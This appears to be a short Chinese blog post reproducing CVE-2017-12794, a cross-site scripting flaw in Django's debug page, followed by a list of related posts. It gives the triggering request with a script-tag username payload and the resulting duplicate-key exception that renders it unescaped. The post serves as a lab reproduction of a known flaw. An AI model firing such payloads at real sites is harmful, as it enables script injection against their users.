Django debug page XSS漏洞(CVE-2017-12794)
时光如瑾雨微凉 2020-02-24
1.创建个用户:
ip:8000/create_user/?username=<script>alert(7)</script>
显示用户已创建。
2.触发漏洞,再次访问ip:8000/create_user/?username=<script>alert(7)</script>
3.触发异常:
duplicate key value violates unique constraint "xss_user_username_key" DETAIL: Key (username)=(<script>alert(7)</script>) already exists.
4.这个异常被拼接进The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception,最后触发XSS。
相关推荐
luguanyou 0喜欢 / 0评论 2020-10-05
刘燕娜 0喜欢 / 0评论 2020-09-14
明瞳 0喜欢 / 0评论 2020-08-19
theowl 0喜欢 / 0评论 2020-08-18
ssjdoudou 0喜欢 / 0评论 2020-08-09
ssjdoudou 0喜欢 / 0评论 2020-08-03
EdShao 0喜欢 / 0评论 2020-08-03
taiyanghua 0喜欢 / 0评论 2020-07-29
Burgesszheng 0喜欢 / 0评论 2020-07-28
hoooooolyhu 0喜欢 / 0评论 2020-07-28
luguanyou 0喜欢 / 0评论 2020-07-28
谢育政 0喜欢 / 0评论 2020-07-28
Ashes 0喜欢 / 0评论 2020-07-25
tuxlcsdn 0喜欢 / 0评论 2020-07-19
时光如瑾雨微凉 0喜欢 / 0评论 2020-07-19
Qc 0喜欢 / 0评论 2020-07-19
heniancheng 0喜欢 / 0评论 2020-07-19
hoooooolyhu 0喜欢 / 0评论 2020-07-08
yawei 0喜欢 / 0评论 2020-07-06
晓杰0 0喜欢 / 0评论 2020-07-06
iflreey 0喜欢 / 0评论 2020-07-04
D先生 0喜欢 / 0评论 2020-07-04
inspuryhq 0喜欢 / 0评论 2020-06-28
D先生 0喜欢 / 0评论 2020-06-28
huangyx 0喜欢 / 0评论 2020-06-28
89403969 0喜欢 / 0评论 2020-06-28
明瞳 0喜欢 / 0评论 2020-06-28
zcyuefan 0喜欢 / 0评论 2020-06-28
Yort 0喜欢 / 0评论 2020-06-28
harddays 0喜欢 / 0评论 2020-06-25
luguanyou 0喜欢 / 0评论 2020-06-21
tuxlcsdn 0喜欢 / 0评论 2020-06-21
harddays 0喜欢 / 0评论 2020-06-21
hell0kitty 0喜欢 / 0评论 2020-06-17
D先生 0喜欢 / 0评论 2020-06-16
清水寺小僧 0喜欢 / 0评论 2020-06-17
Burgesszheng 0喜欢 / 0评论 2020-06-16
cuiwenjie 0喜欢 / 0评论 2020-06-16
iflreey 0喜欢 / 0评论 2020-06-15
cuiwenjie 0喜欢 / 0评论 2020-06-14
bizercsdn 0喜欢 / 0评论 2020-06-14
cairencong 0喜欢 / 0评论 2020-06-14
黄书胜 0喜欢 / 0评论 2020-06-14
aweilark 0喜欢 / 0评论 2020-06-14
Dreamya 0喜欢 / 0评论 2020-06-13
明月清风精进不止 0喜欢 / 0评论 2020-06-13
唐宋源码清 0喜欢 / 0评论 2020-06-13